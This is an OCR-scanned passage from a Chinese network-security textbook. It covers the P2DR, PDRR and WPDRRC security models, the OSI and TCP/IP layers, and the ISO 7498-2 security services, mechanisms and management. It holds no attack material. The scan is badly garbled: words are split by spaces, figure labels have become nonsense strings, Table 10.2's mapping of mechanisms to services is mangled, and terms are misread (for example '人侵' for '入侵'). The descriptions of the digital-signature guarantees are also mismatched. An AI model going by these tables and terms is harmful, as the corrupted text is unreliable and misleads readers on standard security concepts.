响应 是 解决 潜在 安全 问题 的 有 效 方法 。 响 应 就 是 在 检测 系统 出 现 了 攻击 或 攻击 企图 之 
后 ,及 时 采取 有 效 的 处 理 措施 , 阻 断 可 能 的 破坏 活动 ,避免 危害 进一步 扩大 ,把 系统 调整 到 安 
全 状态 ,或 使 系统 提供 正常 的 服务 。 

P2DR 模型 采用 被 动 防御 与 主动 防御 相 结 合 的 方式 ,是 目前 比较 科学 的 安全 模型 。 
P2DR 模型 也 存在 一 个 明显 的 弱点 ,就 是 忽略 了 内 在 的 变化 因素 ,如 人 员 的 流动 人 员 的 素 
质 和 策略 贯彻 的 不 稳定 性 等 。 


10.1.2 PDRR 模型 


网 络 安全 的 整个 环节 可 以 用 一 个 最 常用 的 安全 模型 来 描述 , 即 PDRR 模型 ( 见 
图 10. 2) ,该 模型 是 美国 人 近年 提出 的 概念 。PDRR 是 Protection( 防 护 )、Detection( 检 测 )、 
Response( 响 应 ) ,Recovery( 恢 复 ) 的 缩写 。PDRR 模型 中 整个 安全 策略 包括 防御 、 检 测 、 响 
应 和 恢复 ,这 4 个 部 分 构成 了 一 个 动态 的 信息 安全 周期 。 


一 


Pw 1 uy 
才 直 -| 出 PP) | 失败 | 检测 (D) en 咯 BR) 2 


快 必 


是 


恢复 (R) | 


图 10.2 PDRR 模型 


PDRR 模型 中 安全 策略 的 前 3 个 环节 与 PPDR 模型 中 后 3 个 环节 的 含义 基本 相同 。 最 
后 一 个 环节 ,恢复 是 指 在 系统 被 人 侵 之 后 ,把 系统 恢复 到 原来 的 状态 ,或 者 比 原来 更 安全 的 
状态 。 系 统 恢复 时 ,对 被 人 侵 的 系统 进行 评估 与 重建 ,同时 采取 更 有 效 的 安全 技术 措施 。 每 
次 发 生 和 人 侵 事件 ,防御 系统 都 要 更 新 ,保证 相同 类 型 的 人 侵 事 件 不 能 再 发 生 。 系 统 的 恢复 过 
程 通常 需要 解决 两 个 问题 : 一 是 对 入 侵 所 造成 的 影响 进行 评估 和 系统 的 重建 ,二 是 采取 人 恰 
当 的 技术 措施 。 系 统 的 恢复 主要 有 重建 系统 .通过 软件 和 程序 恢复 系统 等 方法 。 

PDRR 安全 模型 的 目标 是 尽 可 能 地 增 大 保护 时 间 , 尽 量 减 少 检测 时 间 和 响应 时 间 ,在 系 
统 遭 受到 破坏 后 ,应 尽快 恢复 ,以 减少 系统 暴露 时 间 。 及 时 的 检测 和 响应 就 是 安全 。 

PDRR 模型 阐述 的 是 网 络 安全 最 终 的 存在 形态 ,并 没有 阐述 实现 目标 体系 的 途径 和 方 
法 。 同 P2DR 模型 类 似 ,PDRR 模型 也 没有 涉及 管理 等 方面 的 因素 。 


10.1.3 WPDRRC 模型 


我 国 863 信息 安全 专家 组 博采众长 推出 WPDRRC 模型 ,如 图 10. 3 所 示 。 

该 模型 全 面 涵盖 了 各 个 安全 因素 ,突出 了 人 ,策略 ,管理 的 重要 性 ,反映 了 各 个 安全 组 件 
之 间 的 内 在 联系 。 其 中 人 是 核心 ,策略 (包括 法 律 \ 法 规 、 制 度 , 管 理 ) 起 到 桥梁 的 作用 ,而 技 
术 则 落实 在 WPDRRC6 个 环节 的 各 个 方面 。 


网 络 魏 会 余 系 结 欧 


秦 于 案例 的 网 络 安全 技术 与 实践 


(1) 预警 (Warning) : 采用 多 检测 点 数据 收集 和 智 
能 化 的 数据 分 析 方 法 检测 是 否 存在 某 种 恶意 的 攻击 行 
为 ,并 评测 攻击 的 威胁 程度 、 攻 击 的 本 质 、 范 围 和 起 源 ， 
同时 预测 敌 方 可 能 的 行动 。 

(2) 保护 (Protect): 采用 一 系列 的 手段 (识别 、 认 
证 ,授权 ,访问 控制 .数据 加 密 ) 保 障 数 据 的 保密 性 、 完 整 
性 、 可 用 性 、 可 控 性 和 不 可 否认 性 等 。 

(3) 监测 (Detect) : 利用 高 级 技术 提供 的 工具 检查 
系统 存在 的 可 能 提供 黑客 攻击 、 白 领 犯罪 ,病毒 泛滥 脆 图 10.3 WPDRRC 模型 
弱 性 。 即 检测 系统 脆弱 性 检测 、 入 侵 检测 ,病毒 检测 。 

(4) 响应 (Respond): 对 危及 安全 的 事件 ,行为 .过 程 及 时 做 出 响应 处 理 , 杜 绝 危 害 的 进 
一 步 草 延 扩 大 ,力求 系统 尚 能 提供 正常 服务 ,包括 审计 跟踪 、 事 件 报警 .事件 处 理 。 

(5) 恢复 (Restore) : 一 旦 系统 遭 到 破坏 ,将 采取 的 一 系列 的 措施 ,如 文件 的 备份 .数据 
库 的 自动 恢复 等 ,尽快 恢复 系统 功能 ,提供 正常 服务 。 

(6) 反击 (Counterattack) : 利用 高 技术 工具 ,取得 证 据 , 作 为 犯罪 分 子 犯罪 的 线索 、 犯 
罪 依 据 , 依 法 侦查 处 置 犯 罪 分 子 。 


10.2 网 络 安 全 体系 结构 


为 了 保证 网 络 安全 功能 ,降低 网 络 管理 的 开销 ,需要 从 全 局 的 体系 结构 角度 考虑 安全 问 
题 的 整体 解决 方案 。 计 算 机 网 络 安全 体系 结构 是 网 络 安 全 的 抽象 描述 ,对 于 网 络 安全 的 设 
计 、 实 现 与 管理 都 有 重要 的 意义 。 

10.2.1 Internet 网 络 体系 层次 结构 

计算 机 网 络 的 体系 结构 是 计算 机 网 络 的 各 层 及 其 协议 的 集合 。 体 系 结构 就 是 这 个 计算 
机 网 络 及 其 部 件 所 应 完成 的 功能 的 精确 定义 。 

1. 开放 系统 互 连 参考 模型 (OSIL/RM) 

国际 标准 化 组 织 (ISO) 于 1983 年 提出 了 开放 系统 互联 参考 模型 (OSI/RM) , 它 采 用 了 
分 层 的 结构 化 技术 ,任何 系统 只 要 遵循 这 个 标准 就 可 以 进行 通信 ,是 Internet 的 TCP/IP 协 
议 的 基础 。OSI/RM 各 层 的 含义 和 主要 功能 如 表 10. 1 所 示 。 

表 10.1 开放 式 系统 互联 参考 模型 (OSI/RM) 
层次 名 称 主要 功能 功能 概述 应 用 样 例 


7 ”应 用 层 ”做 什么 提供 (OSI) 用 户 服务 ,如 文件 传输 、 电 子 邮 Telnet.HTTP 
件 、 网 络 管理 等 
6 ”表示 层 oes 实现 不 同 格式 和 编码 之 间 的 交换 A TE EPGDIG 


5 ”会 话 层 ”对 方 是 谁 在 两 个 应 用 进程 之 间 建 立 和 管理 不 同形 式 操作 系统 /应 用 访问 
的 通信 对 话 规划 


续 表 
层次 “名称 主要 功能 功能 概述 应 用 样 例 
4 ”传输 层 ”对 方 在 何 处 提供 传送 方式 ,进行 多 路 利用 ,实现 端点 到 TCP、UDP、SPX 
端点 间 的 数据 交换 ,为 会 话 层 实体 提供 透明 
的 、 可 靠 的 数据 传输 服务 
3 ”网络 层 走 哪 条 路 可 以 ”通过 分 组 交换 和 路 由 选择 为 传输 层 实体 提 ”IP、IPX 
到 达 供 端 到 端的 交换 网 络 数据 ,传送 功能 使 得 传 
输 层 摆脱 路 由 选择 、 交 换 方式 、 拥 挤 控制 等 
网 络 传输 细节 ,实现 数据 传输 
2 ”数据 每 一 步 应 该 怎 进行 二 进 制 数据 块 传送 ,并 进行 差错 检测 和 ” IEEE 802. 3/802. 2、 


链 路 层 ” 样 走 数据 流 控制 HDLC 
1 ”物理 层 对 上 一 层 的 每 ”通过 机 械 和 电气 的 互联 方式 把 实体 连接 起 EIS/TIA-232 V. 35 
一 步 怎样 利用 来 ,让 数据 流通 过 10BASE5 .10BASE2 
物理 传输 介质 和 10BASET 


2，Internet 网 络 体系 层次 结构 

Internet 使 用 的 协议 是 TCP/IP 协议 。TCP/IP 协议 是 一 个 4 层 结构 的 网 络 通信 协议 
组 ,这 4 层 协 议 分 别 是 物理 网 络 接口 层 、 网 际 层 、 传 输 层 和 应 用 层 。 

1) 网 络 接 口 层 

网 络 接口 层 定 义 了 Internet 与 各 种 物理 网 络 之 间 的 网 络 接口 。 该 协议 层 接 收 上 层 (IP 
层 ) 的 数据 并 把 它 封装 成 对 应 的 、 特 定 的 帧 ,或 者 从 下 层 物理 层 接收 数据 帧 并 从 数据 帧 中 提 
取 数 据 报 文 , 然 后 提交 给 IP 层 。 

2) 网 际 层 

网 际 层 是 网 络 互联 层 ,负责 相 邻 计算 机 之 间 的 通 


应 用 层 

信 , 提 供 端 到 端的 分 组 传送 ,数据 分 段 与 组 装 、 路 由 选 | 本 
择 等 功能 。 其 功能 包括 3 个 方面 : 处 理 来 自传 输 层 ee 
的 分 组 发 送 请 求 ; 处 理 输入 数据 报 文 ; 处 理 ICMP 报 “一 mz- 二 
AN 同 络 屋 a 网 际 层 

3) 传输 层 数据 通路 层 

为 应 用 层 的 应 用 进程 或 应 用 程序 提供 端 到 端 有 | 物 吏 层 下 昌 人 
效 、 可 靠 的 连接 以 及 通信 和 事务 处 理 。 DO 和 

NE 图 基于 TCP/IP 协议 的 1 与 

pa ~ sy 时. 店 一 组 访 10.4 D nternet 

位 于 TCP/IP 协议 的 最 上 层 , 向 用 户 提供 一 组 应 和 汪 电压 、 人 和 


用 程序 和 各 种 网 络 服务 ,比如 文件 传输 .电子 邮件 等 。 
基于 TCP/IP 协议 的 Internet 与 OSI 参考 模型 的 体系 结构 对 比如 图 10.4 所 示 ,每 层次 
的 关键 安全 要 素 如 图 10. 5 所 示 。 


10.2.2 网 络 安 全 体系 结构 框架 


1989 年 ,ISO 7498 一 2 标准 颁布 ,确定 了 OSI 参考 模型 的 信息 安全 体系 结构 。 在 
ISO 7498 一 2 中 描述 了 开放 系统 互联 安全 的 体系 结构 ,提出 设计 安全 的 信息 系统 的 基础 架构 
中 应 该 包含 5 种 安全 服务 ,能够 对 这 5 种 安全 服务 提供 支持 的 8 类 安全 机 制 以 及 需要 进行 的 


网 络 安 会 余 系 结 欧 


秦 于 案例 的 网 络 安全 技术 与 实践 


5 种 OSI 安全 管理 方式 如 图 10. 6 所 示 。 一 种 安全 服务 可 以 通过 某 种 安全 机 制 单独 提供 ,也 
可 以 通过 多 种 安全 机 制 联合 提供 ; 一 种 安全 机 制 可 用 于 提供 一 种 或 多 种 安全 服务 。 


HTTPS、SET .门户 网 站 .PGP 等 应 用 层 
有 状态 检测 等 、 信 息 流 管制 运输 层 
安全 路 由 协议 IPSec、 分 组 过 滤 .NAT 等 网 际 层 
安全 端口 , 接 接 入 认证 、 
以 太 | 入 认证 eh 接 入 | VPN、L2TP 省 
网 | 电缆 .光缆 保 本 网 络 | 电缆 .光缆 保 
护 ,电磁 屏 项 网 | 信号 能 量 控制 护 ,电磁 屏 基 物理 层 | 层 
加 密 、 报 文摘 要 和 数字 签名 技术 
TLS、RADIUS 等 本 生 罗 


10.5 各 个 层次 的 安全 要 素 


OSI 参考 模型 


安全 机 制 


加 数 访 数 数 业 路 公 
省 蛙 同 蝇 执 务 由 证 


控 控 
名 制 各 入 中 制 


安全 服务 
10.6 ISO 7498 一 2 安全 体系 结构 三 维 图 


OSI 安全 体系 结构 的 内 容 主 要 包括 : 描述 了 安全 服务 及 相关 的 安全 机 制 ,提出 了 参考 
模型 ,定义 了 安全 服务 和 安全 机 制 在 参考 模型 中 的 位 置 。 

1. 安全 服务 

安全 服务 是 指 加 强 一 个 组 织 的 数据 处 理 系 统 及 信息 传达 安全 性 的 一 种 服务 。OSI 规定 
eae 5 种 安全 服务 。 

1) 鉴别 服务 

鉴别 服务 提供 通信 中 的 对 等 实体 和 数据 来 源 的 鉴别 。 对 等 实体 的 鉴别 是 当 某 层 使 用 下 
层 提供 的 服务 时 ,确信 其 对 等 实体 是 它 所 需要 的 实体 。 数 据 来 源 鉴别 必须 与 实体 鉴别 等 其 
他 服务 相 结合 才能 保证 真实 性 。 鉴 别 服务 可 以 提供 各 种 不 同 程度 的 保护 。 

2) 访问 控制 服务 

访问 控制 服务 防止 未 经 授权 的 用 户 非法 使 用 系统 资源 。 访 问 控制 所 保护 的 资源 可 以 是 
经 OSI 协议 访问 到 的 OSI 资源 或 非 OSI 资源。 这 种 保护 服务 可 以 应 用 于 对 资源 的 各 种 不 
同 的 访问 或 应 用 于 对 一 种 资源 的 所 有 访问 。 

3) 数据 保密 性 服务 

数据 保密 性 服务 保护 网 络 中 各 系统 之 间 交 换 的 数据 ,防止 数据 非 授权 泄漏 。 数 据 保密 


性 服务 包括 : 

(1) 连接 的 保密 性 一 一 为 一 次 连接 上 的 全 部 用 户 数 据 保证 机 密 性 。 

(2) 无 连接 的 保密 性 一 一 为 单个 无 连接 的 服务 数据 单元 中 的 全 部 用 户 数据 保证 机 
密 性 。 

(3) 选择 字段 的 保密 性 一 一 为 那些 被 选择 的 字段 保证 机 密 性 ,这 些 字段 可 能 处 于 某 个 
连接 的 用 户 数据 中 ,可 能 为 单个 无 连接 的 服务 数据 单元 的 字段 。 

(4) 流量 保密 性 一 一 防止 通过 观察 业务 流 得 到 有 用 的 保密 信息 。 

4) 数据 完整 性 服务 

数据 完整 性 服务 提供 数据 完整 性 保护 ,防止 通过 违反 安全 策略 的 方式 进行 非法 修改 。 
数据 完整 性 服务 包括 : 

(1) 有 恢复 功能 的 连接 完整 性 一 一 为 连接 上 的 所 有 用 户 数据 保证 完整 性 ,并 检测 整个 
服务 数据 单元 序列 中 的 数据 是 否 唱 到 任何 算 改 、 插 入 、 删 除 或 重 放 ,同时 试图 补救 恢复 。 

(2) 无 恢复 功能 的 连接 完整 性 一 一 与 有 恢复 功能 的 连接 完整 性 服务 类 似 ,只 是 不 补救 
恢复 。 

(3) 选择 字段 连接 完整 性 一 一 为 在 一 次 连接 上 传送 某 层 服务 数据 单元 的 用 户 数据 ,在 
数据 中 选择 字段 保证 完整 性 ,确定 这 些 被 选 字段 是 否 遭 到 任何 算 改 .插入 删除 或 重 放 。 

(4) 无 连接 完整 性 一 一 当 某 层 提供 时 ,对 发 出 请 求 的 上 层 实体 提供 完整 性 保证 。 这 种 
服务 为 单个 的 无 连接 服务 数据 单元 保证 安全 性 ,确定 收 到 的 服务 数据 单元 是 否 遭 到 筑 改 。 
另外 ,还 在 一 定 程度 上 提供 对 重 放 的 检测 。 

(5) 选择 字段 无 连接 完整 性 一 一 为 单个 无 连接 的 服务 数据 单元 中 的 被 选 字段 提供 完整 
性 ,确定 被 选择 的 字段 是 否 遭 到 筑 改 。 

5) 抗 抵赖 服务 

抗 抵赖 服务 防止 发 送 数据 方 发 送 数据 后 否认 自己 发 送 过 数据 ,或 接收 方 接收 数据 后 否 
认 自己 收 到 过 数据 。 抗 抵赖 服务 包括 : 

(1) 数据 源 发 证 明 的 抗 抵赖 一 一 为 数据 的 发 送 者 提供 数据 交付 证 据 , 这 使 得 接收 者 事 
后 不 能 谎 称 未 收 到 过 这 些 数 据 或 否认 它 的 内 容 。 

(2) 数据 交付 证 明 的 抗 抵赖 一 一 为 数据 的 接收 者 提供 数据 来 源 的 证 据 ,这 使 得 发 送 者 
事后 不 能 谎 称 未 发 送 过 这 些 数 据 或 否认 它 的 内 容 。 

2. 安全 机 制 

安全 机 制 是 指 为 了 保证 网 络 安全 而 必须 完成 的 工作 。ISO 7498 一 2 确定 的 安全 机 制 为 
加 密 机 制 、. 数 据 签名 机 制 . 访 问 控制 机 制 、. 数 据 完 整 性 机 制 ,鉴别 交换 机 制 . 业 务 流 填 充 机 制 、 
路 由 控制 机 制 、 公 正 机 制 。 

1) 加 密 机 制 

加 密 机 制 能 提供 数据 保密 性 ,也 能 为 通信 业务 流 信 息 提供 保密 性 。 

在 OSI 安全 体系 结构 中 应 根据 加 密 所 在 的 层次 及 加 密 对 象 的 不 同 , 而 采用 不 同 的 加 密 
方法 。 加 密 算法 可 以 是 可 道 的 ,也 可 以 是 不 可 逆 的 。 可 北 加 密 算法 又 分 为 对 称 密 钥 加 密 算 
法 和 非 对 称 密 钥 加 密 算法 。 

2) 数字 签名 机 制 

数字 签名 机 制 是 解决 网 络 通信 中 特有 的 安全 问题 的 有 效 方法 。 可 以 完成 对 数据 单元 的 
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签名 ,也 可 以 实现 对 已 有 签名 的 验证 。 

数字 签名 是 附加 在 数据 上 的 一 些 数据 ,或 是 对 数据 所 作 的 密码 变换 ,这 种 数据 或 变换 允 
许 数据 的 所 接收 者 确认 数据 来 源 和 数据 的 完整 性 。 

数字 签名 机 制 能 够 保证 以 下 3 点 : 

(1) 报 文 鉴别 一 一 接收 者 能 够 核实 发 送 者 对 报 文 的 签名 。 

(2) 报 文 的 完整 性 一 一 发 送 者 事后 不 能 抵赖 对 报 文 的 签名 。 

(3) 不 可 否认 一 一 接收 者 不 能 伪造 对 报 文 的 签名 。 

3) 访问 控制 机 制 

访问 控制 机 制 是 按 事先 确定 的 规则 决定 主体 对 客体 的 访问 是 否 合法 。 对 非 授权 或 不 正 
当 的 访问 进行 报警 或 审计 跟踪 。 

(1) 确定 访问 权 。 

可 以 利用 某 个 实体 经 过 鉴别 的 身份 或 关于 该 实体 的 信息 或 该 实体 的 安全 标记 ,确定 并 
实施 实体 的 访问 权 。 

(2) 建立 访问 控制 机 制 的 手段 。 

建立 的 手段 包括 控制 信息 库 、 鉴 别 信 息 、 安 全 标记 、 试 图 访问 的 时 间 、 试 图 访问 的 路 由 、 
访问 持续 的 时 间 等 。 

4) 数据 完整 性 机 制 

数据 完整 性 机 制 包括 两 种 形式 : 一 种 是 数据 单元 的 完整 性 , 另 一 种 是 数据 单元 流 的 完 
整 性 。 数 据 完 整 性 机 制 就 是 确保 数据 单元 或 者 数据 单元 流 完 整 性 的 各 种 机 制 。 可 以 使 用 不 
同 的 机 制 提供 这 两 种 不 同 的 完整 性 服务 。 

5) 鉴别 交换 机 制 

鉴别 交换 机 制 是 以 交换 信息 的 方式 来 确认 实体 身份 的 机 制 。 

选择 鉴别 交换 技术 取决 于 他 们 应 用 的 环境 ,鉴别 技术 包括 时 间 戳 和 同步 时 钟 . 两 次 握手 
和 三 次 握手 和 抗 抵 赖 服务 等 。 

6) 业务 流 填 充 机 制 

业务 流 填充 机 制 主要 是 对 抗 攻击 者 进行 流量 分 析 。 采 用 的 方法 一 般 在 应 用 连接 空闲 
时 ,连续 发 出 伪 随 机 序列 ,使 得 攻击 者 不 知 哪些 是 有 用 信息 、 哪 些 是 无 用 信息 。 该 机 制 可 以 
用 于 提供 各 种 等 级 的 保护 ,只 在 业务 填充 收 到 保密 性 服务 保护 时 才 有 效 。 

7) 路 由 控制 

路 由 控制 机 制 可 使 信息 发 送 者 选择 特殊 的 路 由 ,以 保证 数据 安全 。 

(1) 路 由 选择 : 路 由 既 可 以 动态 选择 ,也 可 以 事先 选择 ,以 便 只 利用 物理 上 安全 的 子 
网 .中继站 或 链 路 。 

(2) 路 由 连接 : 在 检测 到 持续 操作 攻击 时 ,系统 可 以 指示 网 络 服务 提供 者 通过 不 同 的 
路 由 建立 连接 。 

(3) 安全 策略 : 安全 策略 会 禁止 携带 某 些 安全 标记 的 数据 通过 某 些 子 网 .中 继 站 或 
链 路 。 

8) 公证 机 制 

公证 机 制 通过 第 三 方 机 构 提供 对 通信 数据 的 完整 性 .通信 实体 .时 间 等 内 容 的 公正 服 
务 ,仲裁 出 现 的 问题 。 


第 三 方 公正 机 构 得 到 通信 实体 的 信任 ,并 且 掌 握 按照 某 种 可 证 实 方式 提供 所 需 信息 。 
在 使 用 公正 机 制 时 ,数据 便 在 参与 通信 的 实体 之 间 经 由 受到 保护 的 通信 场合 和 公正 机 构 进 
行 传送 。 

3. 安全 服务 和 安全 机 制 的 关系 

安全 服务 和 安全 机 制 有 着 密切 的 关系 ,安全 服务 是 由 安全 机 制 实现 的 。 一 个 安全 服务 
可 以 由 一 个 或 几 个 安全 机 制 来 实现 ; 同一 个 安全 机 制 也 可 以 用 于 实现 不 同 的 安全 服务 中 ， 
他 们 并 不 是 一 一 对 应 的 。 总 之 ,安全 服务 与 机 制 好 比 领导 班子 与 员工 集体 ( 非 一 一 对 应 ): 
前 者 制订 计划 ,后 者 执行 计划 ; 前 者 做 对 的 事情 ,后 者 把 事情 做 对 。 安 全 服务 和 安全 机 制 的 
关系 见 表 10. 2。 


表 10.2 OSI 的 安全 服务 ,安全 机 制 及 OSI 协议 层 的 关系 


安全 机 制 知客 数字 | 访问 2 鉴别 > 路 由 公证 提供 服务 的 
安全 服务 签名 | 控制 人 交换 | 充 | 控制 人 ”| oSI 协 议 层 
监 别 对 等 实体 V V x x JV x x X |3,4,7 
数据 来 源 J V x x 尖 4 X |3,4,7 
访问 控制 x Se [| x 受 又 x | dy 
有 连接 的 保密 性 JV x x x x x JV X |1,2,3,4,7 
数据 | 无 连接 保密 性 J x x x x x V X |2,3,4,7 
保密 性 | 选择 字段 的 保密 性 Vv x x 区 区 站 X XxX | 
流量 保密 性 V x x x x V JV xX | 37 
a V 关 x JV 尖 x x X |4,7 
人 Vv 质 x ~ x x x X |3,4,7 
到 人 选择 字段 连接 完整 性 ~ x x Nh x x x 尖 - || 深 
完整 性 名 
无 连接 完整 性 Sh V x Nh x x 这 x |3,4,7 
选择 字段 无 连接 完整 性 | VV | V X | V x 涛 x 深 ‖| 学 
抗 抵赖 数据 源 发 证 明 的 抗 抵赖 | X | V x | V x x 区 过 :| 这 
交付 证 明 的 抗 抵赖 x V x J x x x “|? 


注 : V 表示 该 安全 机 制 提供 该 安全 服务 ,或 与 其 他 机 制 结合 提供 安全 服务 。XX 表 示 不 提供 。 


4. 安全 服务 和 网 络 层次 的 关系 

ISO 的 开放 系统 互 连 参考 模型 的 七 个 不 同 层次 各 自 完 成 不 同 的 功能 ,相应 地 ,在 各 层 需 
要 提供 不 同 的 安全 机 制 和 安全 服务 ,为 各 系统 单元 提供 不 同 的 安全 特性 。 

1) 鉴别 服务 

网 络 层 具备 进行 网 络 主机 和 设备 鉴别 的 参数 要 求 ,可 以 满足 数据 通信 对 网 关 的 选择 的 
服务 要 求 , 同 时 可 以 满足 网 络 通信 管理 信息 的 来 源 鉴 别 要求 。 

传输 层 具备 网 络 通信 中 系统 端口 鉴别 的 参数 要 求 , 在 一 个 连接 的 开始 前 和 持续 过 程 中 
能 够 提供 两 个 或 多 个 通信 实体 的 进程 鉴别 服务 。 作 为 OSI 模型 中 最 低 的 满足 实体 鉴别 参 
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数 要 求 的 层次 ,可 以 为 应 用 层 实 体 提供 鉴别 服务 。 

应 用 层 可 以 提供 和 满足 应 用 实体 间 的 特殊 或 专项 鉴别 服务 。 

2) 访问 控制 服务 

网 络 层 可 以 确立 网 络 层 实体 的 标识 ,如 精细 到 网 络 设备 或 主机 访问 主体 和 客体 标识 , 因 
而 ,可 以 驱动 基于 网 络 设备 .主机 、 网 段 或 子 网 的 访问 控制 机 制 ,提供 网 络 层 实体 访问 控制 服 
务 。 这 种 服务 所 控制 的 对 象 的 粒度 是 非常 粗糙 的 , 它 仅 在 网 络 层 的 实体 之 间 有 所 不 同 ,但 正 
因为 如 此 ,其 控制 和 保护 的 范围 也 相对 广泛 。 

与 网 络 层 道理 相同 ,传输 层 可 提供 基于 网 络 服务 端口 的 访问 控制 机 制 ,控制 端 到 端 之 间 
数据 共享 或 设备 共享 。 

应 用 层 能 提供 应 用 相关 的 访问 控制 服务 ,将 访问 控制 建立 在 应 用 层 实 体 ,如 应 用 进程 或 
所 代表 的 用 户 ,将 保护 精细 到 具体 应 用 过 程 中 涉及 的 共享 资源 。 

3) 数据 保密 性 服务 

物理 层 可 通过 成 对 插入 透明 的 电气 转换 设备 实现 线路 信号 的 保密 ,通过 线路 物理 特性 
可 提供 电磁 辐射 控制 ,物理 层 保密 性 服务 相对 简单 透明 ,但 只 能 抵抗 线路 切入 攻击 。 

数据 链 路 层 可 以 提供 相 邻 的 节点 间 交 换 数据 的 保密 ,从 保密 作用 上 看 ,与 物理 层 一 致 ， 
与 物理 层 保密 性 服务 构成 元 余 的 线路 保密 服务 。 

网 络 层 具 备 建 立 网 络 主机 和 设备 及 保密 性 服务 条 件 , 在 网 关上 可 以 提供 中 继 式 保密 机 
制 或 分 段 式 保密 机 制 。 但 这 种 保密 服务 精细 到 主机 或 网 段 级 , 即 认 为 保密 性 服务 相关 的 主 
机 或 网 关 是 可 信 的 ,提供 的 保密 服务 是 一 致 的 。 

传输 层 可 以 提供 网 络 服务 端口 的 端 端 交换 数据 保密 ,因而 ,可 以 区 分 不 同 端口 间 的 数据 
交换 保密 需求 。 同 时 ,传输 层 提 供 的 保密 是 端 到 端的 ,传输 中 间 的 节点 不 参与 这 种 数据 保密 
性 服务 。 

应 用 层 具 备 建 立 应 用 进程 间 的 交换 数据 保密 服务 条 件 ,但 也 增加 了 保密 性 服务 参数 管 
理 复杂 性 ,相对 低层 保密 服务 而 言 , 对 网 络 主机 的 密码 算法 和 密 钥 管理 提出 了 更 高 的 要 求 。 

4) 数据 完整 性 服务 

物理 层 没 有 检测 或 恢复 机 制 , 不 具备 数据 完整 性 服务 条 件 。 

数据 链 路 层 具备 相 邻 的 节点 之 间 的 完整 性 服务 条 件 . 但 对 网 络 上 的 每 个 节点 增加 了 系 
统 时 空 开 销 , 而 提供 的 完整 性 不 是 最 终 意义 的 完整 ,所 以 提供 这 种 服务 被 认为 具备 效益 
条 件 。 

网 络 层 与 数据 链 路 层 相似 ,也 被 认为 不 具备 效益 条 件 。 对 网 络 层 实体 ,它们 自己 产生 和 
管理 的 网 络 管理 信息 的 完整 性 服务 是 必须 的 ,但 这 种 服务 是 网 络 层 内 部 的 需要 ,不 对 高 层 开 
放 。 因 而 不 是 我 们 所 指 的 数据 完整 服务 ,更 应 该 作为 网 络 层 内 部 机 制 处 理 。 

传输 层 因 为 提供 了 真正 的 端 到 端的 连接 ,因而 ,被 认为 最 适宜 提供 数据 完整 性 服务 ,不 
过 通常 传输 层 提供 的 数据 完整 性 是 不 具备 语义 完整 性 服务 性 能 。 

应 用 层 可 以 建立 应 用 实体 相关 的 语义 级 完整 性 服务 。 

5) 抗 抵 赖 服务 

抗 抵赖 服务 必须 具备 完整 的 证 明 信 息 和 公证 机 制 。 显 然 在 传输 层 以 下 都 不 具备 完整 的 
证 明 信 息 交 换 条 件 。 抗 抵赖 服务 的 证 明 信 息 的 管理 与 具体 服务 项 目 密切 相关 ,与 公证 机 制 
相关 ,通常 都 建立 在 应 用 层 之 上 。 安 全 服务 和 网 络 层次 的 关系 见 表 10. 2。 


5. 安全 管理 

为 了 有 效 地 运行 安全 服务 ,需要 有 相关 措施 来 支持 ,这 些 措施 就 是 安全 管理 。 安 全 管理 
把 管理 信息 分 配 到 有 关 安 全 服务 和 安全 机 制 中 去 ,对 他 们 进行 管理 。 与 OSI 有 关 的 安全 管 
理 活动 有 3 类 : 系统 安全 管理 ,安全 服务 管理 和 安全 机 制 管理 。 其 中 系统 安全 管理 涉及 总 
的 OSI 环境 方面 的 管理 ,安全 服务 管理 涉及 特定 安全 服务 的 管理 ,安全 机 制 管理 涉及 特定 
安全 机 制 的 管理 。 

1) 系统 安全 管理 

系统 安全 管理 涉及 总 的 OS 环境 方面 管理 。 属 于 这 一 类 安全 管理 的 典型 活动 有 : 

(1) 总 体 安全 策略 的 管理 ,包括 一 致 性 的 修改 与 维护 。 

(2) 与 其 他 OSI 管理 功能 的 相互 作用 。 

(3) 与 安全 服务 管理 和 安全 机 制 管理 的 交互 作用 。 

(4) 事件 处 理 管理 ,包括 远程 报告 违反 系统 安全 的 明显 企图 ,对 触发 事件 报告 的 阔 值 进 
行 修改 。 

(5) 安全 审计 管理 ,包括 选择 被 记录 和 被 远程 收集 的 事件 ,授予 或 取消 对 所 选 事件 进行 
审计 跟踪 日 志 记录 的 能 力 ,审计 记录 的 远程 收集 ,准备 安全 审计 报告 。 

(6) 安全 恢复 管理 ,包括 维护 用 来 对 安全 事故 做 出 反应 的 规则 ,远程 报告 对 系统 安全 的 
明显 违规 ,安全 管理 者 的 交互 。 

2) 安全 服务 管理 

安全 服务 管理 涉及 特定 安全 服务 的 管理 。 在 管理 一 种 特定 安全 服务 时 可 能 的 典型 活动 
包括 : 

(1) 为 安全 服务 指派 安全 保护 的 目标 。 

(2) 制定 与 维护 选择 规则 ,选取 安全 服务 所 需 的 特定 的 安全 机 制 。 

(3) 协商 需要 取得 管理 员 同 意 的 可 用 的 安全 机 制 。 

(4) 通过 适当 的 安全 机 制 管理 功能 调用 特定 的 安全 机 制 。 

(5) 与 其 他 的 安全 服务 管理 功能 和 安全 机 制 管 理 功 能 进行 交互 。 

3) 安全 机 制 管理 

安全 机 制 管理 涉及 特定 安全 机 制 的 管理 ,包括 : 

(1) 密 钥 管理 。 其 主要 功能 是 间歇 性 地 产生 与 所 要 求 的 安全 级 别 相应 的 密 钥 ; 根据 访 
问 控制 策略 ,对 于 每 个 密 钥 决定 哪个 实体 可 拥有 密 钥 的 副本 ; 用 可 靠 办 法 使 密 钥 对 开放 系 
统 中 的 实体 是 可 用 的 ,或 将 这 些 密 钥 分 配给 它们 。 

(2) 加 密 管理 。 其 主要 功能 是 与 密 钥 管理 的 交互 作用 ; 建立 密码 参数 ; 进行 密码 同步 。 

(3) 数字 签名 管理 。 其 主要 功能 是 与 密 钥 管理 的 交互 作用 ; 建立 密码 参数 与 密码 算 
法 ; 在 通信 实体 与 可 能 有 的 第 三 方 之 间 使 用 协议 。 

(4) 访问 控制 管理 。 其 主要 功能 是 安全 属性 (包括 口令 ) 的 分 配 ; 对 访问 控制 表 进 行 修 
改 ; 在 通信 实体 与 其 他 提供 访问 控制 服务 的 实体 之 间 使 用 协议 。 

(5) 数据 完整 性 管理 。 其 主要 功能 是 与 密 钥 管理 的 交互 作用 ; 建立 密码 参数 与 密码 算 
法 ; 在 通信 的 实体 间 使 用 协议 。 

(6) 鉴别 管理 。 其 主要 功能 是 将 说 明 信 息 口令 或 密 钥 分 配给 要 求 执行 鉴别 的 实体 ; 和 
在 通信 的 实体 与 其 他 提供 鉴别 服务 的 实体 之 间 使 用 协议 。 
